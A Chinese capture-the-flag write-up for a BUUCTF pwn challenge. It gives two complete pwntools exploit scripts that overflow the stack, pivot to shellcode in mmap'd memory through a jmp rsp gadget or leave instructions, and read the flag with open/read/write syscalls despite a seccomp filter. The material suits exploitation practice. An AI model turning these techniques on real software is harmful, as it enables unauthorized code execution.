BUU-[极客大挑战 2019]Not Bad-WP
这题其实挺简单的,但是我还是没做出来:(
新的观点
原来在对于没开NX的题目可以考虑用jmp rsp的gadget啊!学到了。题目中有这个gadget,所以我们不需要leak栈地址就可以直接执行我们的shellcode。当然这里的shellcode只能写0x28个字节,并且seccomp禁用了除read,wirte,open,exit之外的所有系统调用,长度是不够的,所以考虑在mmap的内存上写并执行
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug',os = 'linux',arch = 'amd64')
#sh = process("./bad")
sh = remote("node3.buuoj.cn",25651)
mapped_addr = 0x123000
jmp_rax = 0x400865
jmp_rsp = 0x400a01
payload = (asm(shellcraft.read(0,mapped_addr,0x100)) + asm("mov rax,0x123000;call rax")).ljust(0x28,'\x00')
payload += p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp")
sh.sendafter("fun!\n",payload)
payload = shellcraft.open("./flag")
payload += shellcraft.read(3,mapped_addr + 0x200,0x40)
payload += shellcraft.write(1,mapped_addr + 0x200,0x40)
sh.sendline(asm(payload))
sh.interactive()
关于seccomp这一系列的函数,他们起到了禁用特定系统调用的作用。奇怪的是_seccomp_init似乎无法多次调用,本来我准备通过第二次调用该函数并设置所有系统调用可使用来实现getshell,但是发现无果。
初始的思路
大概是间隔了一段时间没做题,脑子有些许发浑,想到了用leave实现栈迁移来执行shellcode但是卡了许久才想出做法。其实很容易,栈迁移先不对rsp动手,而是先修改rbp,在0x123000上写好shellcode再通过第二次的leave实现修改rsp,起到执行shellcode的效果
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug',os = 'linux',arch = 'amd64')
#sh = process("./bad")
sh = remote("node3.buuoj.cn",25651)
mapped_addr = 0x123000
restart_addr = 0x400A1A
leave_addr = 0x400A49
pop_rdi_ret = 0x400b13
jmp_rax = 0x400865
jmp_rsp = 0x400a01
payload = 'a' * 0x20 + p64(mapped_addr + 0x20) + p64(restart_addr)
sh.sendlineafter("fun!\n",payload)
payload = asm(shellcraft.read(0,mapped_addr + 0x500,0x500)) + asm("mov rax,0x123500;call rax")
payload = payload.ljust(0x28,'\x00')
payload += p64(0x123000)
sh.sendafter("fun!\n",payload)
payload = shellcraft.open("./flag")
payload += shellcraft.read(3,mapped_addr + 0x200,0x40)
payload += shellcraft.write(1,mapped_addr + 0x200,0x40)
sh.send(asm(payload))
sh.interactive()
简单是真挺简单的,为什么会花我这么多时间啊,明天的高代考试可能没有希望了